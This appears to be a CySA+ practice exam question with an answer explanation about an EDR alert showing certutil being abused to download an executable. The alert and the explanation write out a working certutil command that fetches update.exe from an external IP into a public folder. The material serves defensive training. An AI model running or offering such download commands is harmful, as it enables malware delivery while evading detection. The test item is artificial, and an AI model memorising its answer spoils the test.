CompTIA CySA+ (CS0-003)Security OperationsMedium

An EDR platform generates the following alert on a finance workstation with no active IT ticket: `cmd.exe /c certutil.exe -urlcache -split -f http://185.220.101.7/update.exe C:\Users\Public\update.exe` The parent process is explorer.exe, and the user reports they only opened an email attachment. Which of the following BEST describes this activity?

  1. AA false positive caused by a scheduled Windows Update task
  2. BUse of a living-off-the-land binary (LOLBin) to download a malicious payload
  3. CA Kerberoasting attempt against the domain controller
  4. DA legitimate Windows certificate validation routine
Show answer & explanation

Correct answer: B. Use of a living-off-the-land binary (LOLBin) to download a malicious payload

certutil.exe is a legitimate Windows binary normally used for certificate management, but attackers frequently abuse its -urlcache -split -f flags to download files while evading detection tools that only flag known malware executables. This 'living off the land' technique lets adversaries blend in with normal admin activity, and the context (email attachment, external IP, Public folder) strongly indicates malicious use.

Why the other options are wrong

  • A. Windows Update does not use certutil to fetch executables from external IPs.
  • C. Kerberoasting targets service ticket hashes via Kerberos, unrelated to certutil downloads.
  • D. Certificate validation does not download and save an .exe file to a public folder.

LOLBin Abuse

Living-off-the-land binaries are legitimate OS tools (e.g., certutil, powershell, mshta) that attackers repurpose to perform malicious actions while evading detection.

  • certutil -urlcache -split -f downloads files
  • LOLBins are 'trusted' so they evade allowlisting
  • Context (parent process, destination, network target) reveals malicious intent

Memory trick: Attackers borrow your own tools to break in unnoticed.

More Security Operations questions